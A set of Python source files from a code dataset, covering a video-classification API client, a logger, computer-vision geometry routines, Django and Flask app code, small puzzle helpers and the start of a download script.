'expire_token': True in the options argument.\n\n In addition, you would have to refresh manually if another client has expired your access token.\n\n You can pass the 'request_from_server': True option to make a request\n to the server for the access token without invalidating it. This is useful if you are running\n multiple clients with the same token so they don't endlessly refresh each others' tokens\n \"\"\"\n\n (endpoint, method) = self.endpoints['token']\n\n if not options.get('expire_token') and not options.get('request_from_server'):\n if self.token and not self.token.expired():\n return self.token\n\n try:\n query_data = {'grant_type': self.grant_type,\n 'client_id': self.client_id, 'client_secret': self.client_secret}\n if options.get('expire_token'):\n query_data['refresh'] = 'true'\n response = requests.request(method, endpoint, data=query_data)\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n self.check_errors(response, error.AuthorizationError)\n\n self.save_token(response)\n\n @api_call(error.InvalidQueryError)\n def classify_video(self, detector_id, video_url=None, video_file=None):\n \"\"\"\n Classify a video from a url with a detector\n\n detector_id: a unique id for the detector\n video_url: internet URL for the video to classify\n \"\"\"\n\n MAX_LOCAL_VIDEO_SIZE = 300 * 1024 * 1024\n\n (endpoint, method) = self.endpoints['classify_video']\n\n if not video_url and not video_file:\n raise error.InvalidQueryError(\n message='Missing required parameter: video_url or video_file')\n\n if video_url and video_file:\n raise error.InvalidQueryError(\n message='Cannot classify a URL and local file in the same request')\n\n if isinstance(video_file, list):\n raise error.InvalidQueryError(\n message='Only one video can be uploaded at a time')\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {'detector_id': detector_id}\n if video_url:\n data['url'] = video_url\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n elif video_file:\n with self.filereader.get_file(video_file) as file_to_upload:\n files = {'file': file_to_upload}\n file_size = os.fstat(file_to_upload.fileno()).st_size\n\n if file_size > MAX_LOCAL_VIDEO_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_to_upload.name, self.bytes_to_mb(MAX_LOCAL_VIDEO_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n except error.InvalidQueryError as e:\n raise e\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def get_video_results(self, video_id, threshold=1, response_format='json'):\n \"\"\"\n Get the current classifications for a given video ID\n\n video_id: a unique id for the classified video\n threshold: the cutoff for confidence level in the detection at each timestamp\n response_format: 'csv' or 'json' for the response format\n \"\"\"\n (endpoint, method) = self.endpoints['get_video_results']\n\n if response_format == 'csv' and self.json_format:\n print('cannot return csv format when json_format True is specified upon API object initialization')\n print('requesting JSON format...')\n response_format = 'json'\n\n endpoint = endpoint.replace(':key', video_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n params = {'videoId': video_id, 'threshold': threshold, 'format': response_format}\n return requests.request(method, endpoint, **{'headers': headers, 'params': params})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def create_detector(self, zip_file, name, detector_type):\n \"\"\"\n Create a new detector with the contents of the zip file\n\n detector_type: general, facial_recognition, or facial_characteristics\n name: the detector's display name\n zip_file: a zip file containing the images to be used in the detector creation\n the root folder should contain only directories which will become the labels for detection\n each of these directories should contain only images corresponding to that label.\n\n However, there is an exception if you want to add negative examples to a label.\n In that case, put the negative images for the label in a folder called \"negative\" inside the corresponding label.\n\n To include bounding boxes, include one file called bbox.csv in the top level directory.\n Each line of this file should be formatted as follows:\n 0.25, 0.3, 0.75, 0.8, cat, positive, image.jpg\n 0.25, 0.4, 0.55, 0.7, dog, positive, picture.jpg\n 0.0, 0.1, 0.2, 0.3, cat, negative, raccoon.jpg\n\n Column definitions:\n top left X coordinate, top left Y coordinate, bottom right X coordinate, bottom right Y coordinate, label, positive or negative example, file name\n\n Max 300 MB zip file upload\n\n structure example:\n cat/\n garfield.jpg\n nermal.png\n dog/\n odie.TIFF\n negative/\n lobo.jpg\n bbox.csv\n \"\"\"\n MAX_LOCAL_ZIP_SIZE = 300 * 1024 * 1024\n\n (endpoint, method) = self.endpoints['create_detector']\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {'name': name, 'detector_type': detector_type}\n with self.filereader.get_file(zip_file) as file_to_upload:\n files = {'file': file_to_upload}\n file_size = os.fstat(file_to_upload.fileno()).st_size\n\n if file_size > MAX_LOCAL_ZIP_SIZE:\n raise error.InvalidQueryError(message='File %s is larger than the limit of %d megabytes' % (file_to_upload.name, self.bytes_to_mb(MAX_LOCAL_ZIP_SIZE)))\n\n return requests.request(method, endpoint, **{'headers': headers, 'files': files, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def train_detector(self, detector_id, name=None, detector_type=None):\n \"\"\"Begin training the detector\"\"\"\n (endpoint, method) = self.endpoints['train_detector']\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n data = {}\n if name:\n data['name'] = name\n if detector_type:\n data['detector_type'] = detector_type\n\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def detector_info(self, detector_id):\n \"\"\"Get information about detector\"\"\"\n (endpoint, method) = self.endpoints['detector_info']\n\n endpoint = endpoint.replace(':key', detector_id)\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n return requests.request(method, endpoint, **{'headers': headers})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def register_stream(self, stream_url, stream_name):\n (endpoint, method) = self.endpoints['register_stream']\n\n try:\n headers = { 'Authorization': self.token.authorization_header() }\n data = {\n 'name': stream_name,\n 'url': stream_url\n }\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def monitor_stream(self, stream_id, detector_id, **options):\n (endpoint, method) = self.endpoints['monitor_stream']\n endpoint = endpoint.replace(':detector_id', detector_id)\n endpoint = endpoint.replace(':stream_id', stream_id)\n\n try:\n headers = { 'Authorization': self.token.authorization_header() }\n data = {\n 'thresholds': options.get('thresholds'),\n 'startTime': options.get('start_time'),\n 'endTime': options.get('end_time'),\n 'endpoint': options.get('endpoint')\n }\n return requests.request(method, endpoint, **{'headers': headers, 'data': data})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n @api_call(error.InvalidQueryError)\n def account_info(self):\n \"\"\"Get user account and credits information\"\"\"\n (endpoint, method) = self.endpoints['account_info']\n\n try:\n headers = {'Authorization': self.token.authorization_header()}\n return requests.request(method, endpoint, **{'headers': headers})\n except Exception as e:\n raise error.APIConnectionError(message=e)\n\n # -----------------------------------------------------------------\n # Helper methods and helper classes\n # -----------------------------------------------------------------\n\n def bytes_to_mb(self, bytes):\n return bytes / 1024 / 1024\n\n def check_errors(self, response=None, UserErr=None):\n \"\"\"Raise specific errors depending on how the API call failed\"\"\"\n status = response.status_code\n code = None\n try:\n code = response.json().get('code')\n except:\n pass\n\n if status == 429 and code == 'rate_err':\n raise error.RateLimitError(response)\n elif status == 402 and code == 'payment_err':\n raise error.PaymentError(response)\n elif status / 100 == 4:\n if code == 'token_expiration_err':\n raise TokenExpirationError(response)\n elif UserErr:\n raise UserErr(response)\n else:\n raise error.APIError(response)\n elif code == 'media_err':\n raise error.MediaError(response)\n elif status / 100 == 5 and code == 'server_err':\n raise error.ServerError(response)\n elif status / 100 != 2:\n raise error.APIError(response)\n\n def format_response(self, response):\n \"\"\"Format the output according to the options (json, print to screen)\"\"\"\n if self.print_output:\n print(response.text)\n if self.json_format:\n return response.json()\n else:\n return response.text\n\n def save_token(self, response):\n \"\"\"Extracts the access token from the API response\"\"\"\n res = response.json()\n\n if isinstance(res, str):\n print(response.text)\n raise error.APIError(message='Could not parse the response')\n\n access_token = res['access_token']\n token_type = res['token_type']\n expires_in = res['expires_in']\n\n if not access_token or not token_type or not expires_in:\n raise error.APIError(\n message='Required parameters not found in the response')\n\n self.token = self.Token(token_type, access_token, expires_in)\n\n class Token(object):\n \"\"\"Represents an OAuth access token\"\"\"\n\n def __init__(self, token_type, token_str, expiration):\n self.token_type = token_type\n self.token_str = token_str\n self.born = datetime.datetime.now()\n self.lifetime = expiration\n\n def authorization_header(self):\n return self.token_type + \" \" + self.token_str\n\n def expired(self):\n return self.born + datetime.timedelta(0, int(self.lifetime)) < datetime.datetime.now()\n\n class FileReader(object):\n \"\"\"Reads files for classification input\"\"\"\n\n def __init__(self):\n pass\n\n def get_file(self, file_input):\n \"\"\"Extracts file from file path or returns the file if file is passed in\"\"\"\n local_file = file_input\n if isinstance(file_input, str):\n local_file = open(file_input, 'rb')\n\n return local_file\n\nMatroid = MatroidAPI\n","sub_path":"matroid/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":18460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"172800301","text":"import logging\nimport logging.handlers\nimport sys\nimport os\nLOGGER_NAME = 'api-logger'\nDEBUG = \\\n os.getenv(\"ENVIRONMENT\") == \"development\" \\\n or os.getenv(\"ENVIRONMENT\") == \"local\" \\\n or os.getenv(\"ENVIRONMENT\") is None \\\n or os.getenv(\"DEBUG_LOGS\") == \"true\"\n\n\nclass LogWrapper:\n def __init__(self, name):\n self.logger = logging.getLogger(LOGGER_NAME)\n self.logger.setLevel(logging.DEBUG)\n # create file handler which logs even debug messages in prod\n fh = logging.handlers.RotatingFileHandler('api_logger.log', maxBytes=500240, backupCount=5)\n fh.setLevel(logging.DEBUG)\n\n # create console handler with a higher log level\n ch = logging.StreamHandler(stream=sys.stdout)\n\n if DEBUG:\n ch.setLevel(logging.DEBUG)\n else:\n ch.setLevel(logging.INFO)\n\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n\n # add the handlers to the logger\n self.logger.addHandler(fh)\n self.logger.addHandler(ch)\n self.name = name\n\n def debug(self, msg):\n self.log('debug', msg)\n\n def info(self, msg):\n self.log('info', msg)\n\n def warning(self, msg):\n self.log('warning', msg)\n\n def warn(self, msg):\n self.log('warning', msg)\n\n def error(self, msg):\n self.log('error', msg)\n\n def critical(self, msg):\n self.log('critical', msg)\n\n def log(self, *params):\n log_levels = {\n \"critical\": 50,\n \"error\": 40,\n \"warning\": 30,\n \"info\": 20,\n \"debug\": 10,\n \"notset\": 0\n }\n\n incoming_level = log_levels[params[0]]\n msg = f\"({params[0]} @ {self.name}) {params[1]}\"\n # print(\"****\", msg, incoming_level)\n self.logger.log(incoming_level, msg)\n","sub_path":"src/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"96262413","text":"\"\"\"\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\nClass for holding the data of a root of a Coxeter group\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\"\"\"\n\n\nclass Root(object):\n def __init__(self, coords=(), index=None, mat=None):\n \"\"\"\n :param coords : coefficients of this root as a linear combination of simple roots.\n :param index : an integer, the index of this root.\n :param mat: matrix of the reflection of this root.\n \"\"\"\n self.coords = coords\n self.index = index\n self.mat = mat\n # reflection by simple roots: {s_i(α), i=0, 1, ...}\n self.reflections = [None] * len(self.coords)\n\n def __eq__(self, other):\n \"\"\"\n Check if two roots are equal, assume they are in the same root system.\n \"\"\"\n if isinstance(other, Root):\n return all(self.coords == other.coords)\n return False\n","sub_path":"src/uniform-tilings/coxeter/root.py","file_name":"root.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"278980192","text":"\n# coding: utf-8\n\n# In[1]:\n\nfrom __future__ import division\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport PIL.Image as Image\n\n\n# In[ ]:\n\n\n\n\n# In[2]:\n\ndef compute_fundamental(x1, x2):\n \"\"\" Compute the fundamental matrix from corresponding points\n (x1,x2 3*n arrays) using the normalized 8 point algorithm.\n each row is constructed as \n [x'*x, x'*y, x', y'*x, y'*y, y', x,y,1] <-w는 1이니까. \"\"\"\n \n n =x1.shape[1]\n if x2.shape[1] !=n:\n raise ValueError(\"Number of points don't match. \")\n \n # build matrix for equations\n A = np.zeros((n,9)) # x1 = [[x,x,x,...],[y,y,y,....],[w,w,w,....]]\n for i in range(n):\n A[i]= [x1[0,i]*x2[0,i], x1 [0,i]*x2[1,i], x1 [0,i]*x2[2,i],\n x1[1,i]*x2[0,i], x1 [1,i]*x2[1,i], x1 [1,i]*x2[2,i], \n x1[2,i]*x2[0,i], x1 [2,i]*x2[1,i], x1 [2,i]*x2[2,i] ]\n \n #compute linear least square solution\n U, S, V = np.linalg.svd(A)\n F = V[-1].reshape(3,3)\n \n # constrain F\n # make rank 2 by zeroing out las singular value\n U, S, V = np.linalg.svd(F) # 원래 F의 랭크는 2니까. 이런식으로 만들수있음.\n S[2] = 0\n F = np.dot(U, np.dot(np.diag(S),V))\n \n return F\n\n\n# In[3]:\n\ndef compute_epipole(F):\n \"\"\" Compute the (right) epipole from a \n fundamental matrix F.\n (Use with F.T for left epipole.) \"\"\"\n \n # return null space of F (Fx=0)\n U,S,V = np.linalg.svd(F)\n e = V[-1]\n return e/e[2]\n \"\"\"If you want the epipole corresponding to the left null vector \n (corresponding to the epipole in the other image), \n just transpose F before passing it as input.\"\"\"\n\n\n# In[4]:\n\ndef plot_epipolar_line(im, F, x, epipole=None, show_epipole=True):\n \"\"\" Plot the epipole and epipolar line F*x=0\n in an image. F is the fundamental matrix\n and x a point in the other image. \"\"\"\n # F 랑 다른 이미지에서의 포인트좌표를 가지고 epipolar line을 만들수 있음\n \n m,n = im.shape[:2] # 이미지의 가로,세로 구함\n line = np.dot(F,x) # l1 ~ Fx2\n \n # epipolar line parameter and values\n # 이쪽 부분은 잘 모르겠음. 그림 그리려고 전처리 하는거 같긴한데..\n t = np.linspace(0,n,100)\n lt = np.array([(line[2]+line[0]*tt)/(-line[1]) for tt in t])\n \n # take only line points inside the image \n # 이미지 범위를 넘어가는 선은 걍 안보여줌\n ndx = (lt>=0) & (lt P형태로 만들고 있음.\n\n\n# In[11]:\n\ndef compute_P_from_fundamental(F):\n \"\"\" Compute the second camera matrix (assuming P1 = [ i | 0 ])\n from a fundamental matrix. \"\"\"\n \n e = compute_epipole(F.T) # left epipole이라서 T해준거임. 오른쪽은 그냥 보내주면됨.\n Te = skew(e)\n return np.vstack( (np.dot(Te, F.T).T, e)).T # left라서 F.T가 들어간거 같긴한데.. 잘 몰겠음.\n\n\n# In[12]:\n\ndef skew(a):\n \"\"\" Skew matrix A such that a x v = Av for any v. \"\"\"\n \n return np.array([[0, -a[2], a[1]], [a[2], 0, -a[0]], [-a[1], a[0], 0]])\n\n\n# In[13]:\n\ndef compute_P_from_essential(E):\n \"\"\" Computes the second camera matrix (assuming P1 = [i | 0])\n from an essential matrix. Output is a list of four\n possible camera matrics. \"\"\"\n \n # make sure E is rank 2\n U, S, V = np.linalg.svd(E)\n if np.linalg.det(np.dot(U,V))<0 :\n V = -V\n E = np.dot(U, np.dot(np.diag([1,1,0]),V) ) # 지금 S가 1,1로 들어가니까 이상함.\n \n # create matrices (Hartley p 258)\n Z = skew([0,0,-1])\n W = np.array([[0,-1,0],[1,0,0],[0,0,1]]) # hartley matrix의 모양을 만들려고 이러는듯?\n \n # return all four solutions\n P2 = [np.vstack((np.dot(U, np.dot(W,V)).T, U[:,2])).T,\n np.vstack((np.dot(U,np.dot(W,V)).T,-U[:,2])).T,\n np.vstack((np.dot(U,np.dot(W.T,V)).T,U[:,2])).T, \n np.vstack((np.dot(U,np.dot(W.T,V)).T,-U[:,2])).T] # 4개중 어떤게 맞는건지는 나중에 살펴봄.\n\n return P2\n \n\n\n# In[14]:\n\nclass RansacModel(object):\n \"\"\" Class for fundamental matrix fit with ransac.py from\n http://www.scipy.org/Cookbook/RANSAC\"\"\"\n \n def __init__(self, debug=False):\n self.debug = debug\n \n def fit(self, data):\n \"\"\" Estimate fundamental matrix using eight\n selected correspondences. \"\"\" # 들어오는 data형태는 n x 3 형태로 받음. 3은 (x,y,w=1)를 뜻함\n \n # transpose and split data into the two point sets\n data = data.T\n x1 = data[:3, :8] # 8포인트 알고리즘을 쓸거라서 8개의 대응점이 필요한거임 이건 1-view에서의 대응점에 위치한 image좌표\n x2 = data[3:, :8] # 2-view...\n \n # estimate fundamental matrix and return\n F = compute_fundamental_normalized(x1,x2)\n return F\n \n def get_error(self, data, F):\n \"\"\" Compute x.T F x for all correspondences,\n return error for each transformed point. \n 여기서 에러값의 추정치는 sampson distance 라는 measure를 썼음..\"\"\" \n \n # transpose and split data into the two point\n data = data.T\n x1 = data[:3]\n x2 = data[3:]\n \n # Sampsom distance as error measure\n Fx1 = np.dot(F,x1)\n Fx2 = np.dot(F,x2)\n denom = Fx1[0]**2 + Fx1[1]**2 + Fx2[0]**2 + Fx2[1]**2\n err = (np.diag(np.dot(x1.T, np.dot(F,x2))) )**2 / denom \n \n # return error per point\n return err\n\n\n# In[41]:\n\ndef compute_fundamental_normalized(x1,x2):\n \"\"\" Computes the fundamental matrix from corresponding points\n (x1, x2 3*n arrays) using the normalized 8 point algorithm.\"\"\"\n \n n = x1.shape[1]\n if x2.shape[1] != n:\n raise ValueError(\"Number of points don't match.\")\n \n # normalize image coordinates\n x1 = x1 / x1[2]\n mean_1 = np.mean(x1[:2], axis=1) # axis=1 가로로 평균. 즉, Mean_1 = ([x_bar, y_bar])\n S1 = np.sqrt(2) / np.std(x1[:2]) # x1[:2] -> x들과 y들만 뽑음. 근데 np.std(x1[:2])는 x들이랑y들이랑 다 같은 차원으로 보고 std를 구함.\n T1 = np.array([[S1, 0, -S1*mean_1[0]],[0, S1, -S1*mean_1[1]], [0, 0, 1] ])\n x1 = np.dot(T1,x1)\n \n x2 = x2 / x2[2]\n mean_2 = np.mean(x2[:2], axis=1) # axis=1 가로로 평균. 즉, Mean_2 = ([x_bar, y_bar])\n S2 = np.sqrt(2) / np.std(x2[:2]) # x2[:2] -> x들과 y들만 뽑음. 근데 np.std(x2[:2])는 x���이랑y들이랑 다 같은 차원으로 보고 std를 구함.\n T2 = np.array([[S2, 0, -S2*mean_2[0]],[0, S2, -S2*mean_2[1]], [0, 0, 1] ])\n x2 = np.dot(T2,x2)\n \n # compute F with the normalized coordinates\n F = compute_fundamental(x1,x2)\n \n # reverse normalization \n F = np.dot(T1.T, np.dot(F,T2)) # 위에서 노말라이제이션으로 x1,x2를 바꿔서 F를 구한거니까, 다시 denormalization을 해줘야함.\n \n return F/F[2,2] # 노이즈를 없애준거라 생각하면됨.\n\n\n# In[42]:\n\ndef F_from_ransac(x1, x2, model, maxiter=5000, match_theshold=1e-6):\n \"\"\" Robust estimation of a fundamental matrix F from point\n correspondences using RANSAC (ransac.py from\n http://www.scipy.org/Cookbook/RANSAC). \n \n input: x1, x2 (3*n arrays) points in hom. coordinates. \"\"\"\n \n import ransac\n \n data = np.vstack( (x1,x2))\n \n # compute F and return with lnlier index\n F, ransac_data = ransac.ransac(data.T, model, 8, maxiter, match_theshold, 20, return_all=True)\n return F, ransac_data['inliers']\n \n \n\n\n# In[ ]:\n\n\n\n","sub_path":"ch5/sfm.py","file_name":"sfm.py","file_ext":"py","file_size_in_byte":9335,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"8430871","text":"from django.shortcuts import render, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom checkout.models import Order\nfrom .models import UserAccount\nfrom .forms import UserAccountForm\n\n\n@login_required\ndef user_account(request):\n \"\"\" display users profile \"\"\"\n account = get_object_or_404(UserAccount, user=request.user)\n\n if request.method == \"POST\":\n form = UserAccountForm(request.POST, instance=account)\n if form.is_valid():\n form.save()\n messages.success(request, 'Profile updated successfully')\n else:\n messages.error(request, 'Update failed')\n else:\n form = UserAccountForm(instance=account)\n orders = account.orders.order_by('-date').all\n\n context = {\n 'form': form,\n 'orders': orders,\n 'on_account': True\n }\n\n return render(request, 'profile/profile.html', context)\n\n\n@login_required\ndef order_history(request, order_number):\n \"\"\" Displays the order history for the current user \"\"\"\n order = get_object_or_404(Order, order_number=order_number)\n\n messages.info(request, (\n f'This is a past order for order {order_number}.'\n ))\n context = {\n 'order': order,\n 'history': True,\n }\n\n return render(request, 'checkout/checkout_success.html', context)\n","sub_path":"profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"509824856","text":"import numpy as np\nimport pandas as pd\nimport random\n\ndef puzzleBoardSetup(puzzle):\n puzzle = str(puzzle)\n puzzleList = []\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n for let in puzzle:\n if let in alphabet:\n puzzleList.append(\"_ \")\n elif let == \" \":\n puzzleList.append(\" \")\n else:\n puzzleList.append(let + \" \")\n\n puzzleString = \"\"\n for let in puzzleList:\n puzzleString += let\n\n return puzzleString\n\ndef letValid(guessedList, let):\n\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\n if let == \"quit\":\n return \"quit\"\n elif len(let) != 1:\n print(\"please guess only 1 letter\")\n elif let.upper() not in alphabet:\n print(\"please guess a letter\")\n elif let.upper() in guessedList:\n print(\"you've already guessed that, guess again\")\n else:\n return let.upper()\n\ndef checkLet(let, puzzleTest, puzzleSol):\n\n puzzleList = []\n\n for i in range(len(puzzleSol)):\n if let == puzzleSol[i]:\n puzzleList.append(puzzleSol[i])\n else:\n puzzleList.append(puzzleTest[i])\n\n puzzleTest = \"\"\n for i in puzzleList:\n puzzleTest += i\n\n return puzzleTest\n\ndef checkGameOver(puzzleTest, puzzleSol):\n if puzzleTest == puzzleSol:\n return True\n\n return False\n\ndef setSolution(puzzleSol):\n puzzle = str(puzzleSol)\n puzzleList = []\n alphabet = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n for let in puzzle:\n if let in alphabet:\n puzzleList.append(let + \" \")\n elif let == \" \":\n puzzleList.append(\" \")\n else:\n puzzleList.append(let + \" \")\n\n puzzleString = \"\"\n for let in puzzleList:\n puzzleString += let\n\n return puzzleString\n","sub_path":"wheel_of_fortune_functions.py","file_name":"wheel_of_fortune_functions.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"437645112","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# author:owefsad\n# software: PyCharm\n# project: lingzhi-webapi\nimport time\n\nfrom dongtai.endpoint import UserEndPoint, R\nfrom dongtai.models.hook_strategy import HookStrategy\nfrom django.utils.translation import gettext_lazy as _\n\n\nclass EngineHookRuleModifyEndPoint(UserEndPoint):\n def parse_args(self, request):\n \"\"\"\n :param request:\n :return:\n \"\"\"\n try:\n rule_id = request.data.get('rule_id')\n rule_type = request.data.get('rule_type_id')\n rule_value = request.data.get('rule_value').strip()\n rule_source = request.data.get('rule_source').strip()\n rule_target = request.data.get('rule_target').strip()\n inherit = request.data.get('inherit').strip()\n is_track = request.data.get('track').strip()\n\n return rule_id, rule_type, rule_value, rule_source, rule_target, inherit, is_track\n except Exception as e:\n return None, None, None, None, None, None, None\n\n def post(self, request):\n rule_id, rule_type, rule_value, rule_source, rule_target, inherit, is_track = self.parse_args(request)\n if all((rule_id, rule_type, rule_value, rule_source, inherit, is_track)) is False:\n return R.failure(msg=_('Incomplete parameter, please check again'))\n\n strategy = HookStrategy.objects.filter(id=rule_id, created_by=request.user.id).first()\n\n if strategy:\n strategy.value = rule_value\n strategy.source = rule_source\n strategy.target = rule_target\n strategy.inherit = inherit\n strategy.track = is_track\n strategy.update_time = int(time.time())\n strategy.save()\n\n return R.success(msg=_('Strategy has been created successfully'))\n return R.failure(msg=_('Failed to create strategy'))\n","sub_path":"iast/views/engine_hook_rule_modify.py","file_name":"engine_hook_rule_modify.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"385391940","text":"from five import grok\nfrom zope.component import queryUtility\nfrom zope.component.hooks import getSite\n\nfrom plone.registry.interfaces import IRegistry\nfrom plone.app.controlpanel.interfaces import IConfigurationChangedEvent\n\nfrom Products.CMFCore.utils import getToolByName\n\nfrom maxclient import MaxClient\nfrom mrs.max.browser.controlpanel import IMAXUISettings\n\n\n@grok.subscribe(IConfigurationChangedEvent)\ndef updateMAXUserInfo(event):\n \"\"\"This subscriber will trigger when a user change his/her profile data.\"\"\"\n\n # Only execute if the event triggers on user profile data change\n if 'fullname' in event.data:\n site = getSite()\n pm = getToolByName(site, \"portal_membership\")\n if pm.isAnonymousUser(): # the user has not logged in\n username = ''\n return\n else:\n member = pm.getAuthenticatedMember()\n\n username = member.getUserName()\n memberdata = pm.getMemberById(username)\n properties = dict(displayName=memberdata.getProperty('fullname', ''),\n twitterUsername=memberdata.getProperty('twitter_username', '')\n )\n\n registry = queryUtility(IRegistry)\n settings = registry.forInterface(IMAXUISettings, check=False)\n effective_grant_type = settings.oauth_grant_type\n oauth_token = memberdata.getProperty('oauth_token', '')\n\n maxclient = MaxClient(url=settings.max_server, oauth_server=settings.oauth_server, grant_type=effective_grant_type)\n maxclient.setActor(username)\n maxclient.setToken(oauth_token)\n\n maxclient.modifyUser(username, properties)\n","sub_path":"mrs/max/subscribers.py","file_name":"subscribers.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"169994910","text":"import datetime\n\nfrom apps.cinemas.models import Cinema, Hall, HallScheduling, SeatScheduling, Seats\nfrom apps.ext import db\nfrom apps.main.models import Movie\n\n\nclass Order(db.Model):\n id = db.Column(db.Integer, autoincrement=True, primary_key=True)\n # 订单号\n no = db.Column(db.String(50), unique=True, index=True, nullable=False)\n movie_id = db.Column(db.Integer, db.ForeignKey(Movie.id), nullable=False)\n cinema_id = db.Column(db.Integer, db.ForeignKey(Cinema.cid), nullable=False)\n hs_id = db.Column(db.Integer, db.ForeignKey(HallScheduling.hsid))\n ss_id = db.Column(db.Integer, db.ForeignKey(SeatScheduling.id))\n seat_id = db.Column(db.Integer, db.ForeignKey(Seats.sid))\n # 票数\n number = db.Column(db.Integer, nullable=False)\n # 取票码\n ticket_code = db.Column(db.String(100))\n # 总金额\n total = db.Column(db.Numeric(7, 2))\n #创建的时间\n create_date = db.Column(db.DateTime, default=datetime.datetime.now())\n pay_date = db.Column(db.DateTime)\n # 1 表示未支付 2 已支付, 3 表示支付已取票 4 表示支付未取票 5 退票\n status = db.Column(db.SmallInteger, nullable=False)\n # 有效期\n out_time = db.Column(db.DateTime, default=datetime.datetime.now()+datetime.timedelta(minutes=15))\n is_delete = db.Column(db.Boolean, default=False)\n","sub_path":"apps/order/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"208694217","text":"'''\nThe Hamming distance between two integers is the number of positions at which the corresponding bits are different.\n\nGiven two integers x and y, calculate the Hamming distance.\n'''\n\nclass Solution(object):\n def hammingDistance(self, x, y):\n \"\"\"\n :type x: int\n :type y: int\n :rtype: int\n \"\"\"\n res = x ^ y # gives all bits that are different\n count = 0\n while res > 0:\n if res & 1:\n count += 1\n res = res/2\n\n return count\n","sub_path":"problems/math/hammingDistance.py","file_name":"hammingDistance.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"482583176","text":"\"\"\"\nDownloads the following:\n- Stanford CoreNLP\n- Stanford Shift-Reduce Constituency Parser\n- MongoDB Java Driver\n- Glove vectors\n- Word2Vec vectors\n- FastText vectors\n\n\"\"\"\n\nimport argparse\nimport os\nimport shutil\nfrom pathlib import Path\n\nfrom definitions import ROOT_DIR\nfrom syn.helpers.download import download, download_and_extract, download_gensim_vectors\nfrom syn.helpers.logging import set_logger\n\n# Defines logger.\nlog = set_logger()\n\n\ndef get_input_params():\n parser = argparse.ArgumentParser(\n description='Download Stanford CoreNLP and Stanford Shift-Reduce Constituency Parser libraries, '\n 'MongoDB Java Driver and Glove vectors'\n )\n # download_corenlp\n parser.add_argument(\n '--download_corenlp',\n default=True,\n dest='download_corenlp',\n action='store_true',\n help=\"Download Stanford CoreNLP library.\"\n )\n # no_download_corenlp\n parser.add_argument(\n '--no_download_corenlp',\n dest='download_corenlp',\n action='store_false',\n help=\"Don't download Stanford CoreNLP library..\"\n )\n # download_srparser\n parser.add_argument(\n '--download_srparser',\n default=True,\n dest='download_srparser',\n action='store_true',\n help=\"Download Stanford Shift-Reduce Constituency Parser library.\"\n )\n # no_download_srparser\n parser.add_argument(\n '--no_download_srparser',\n 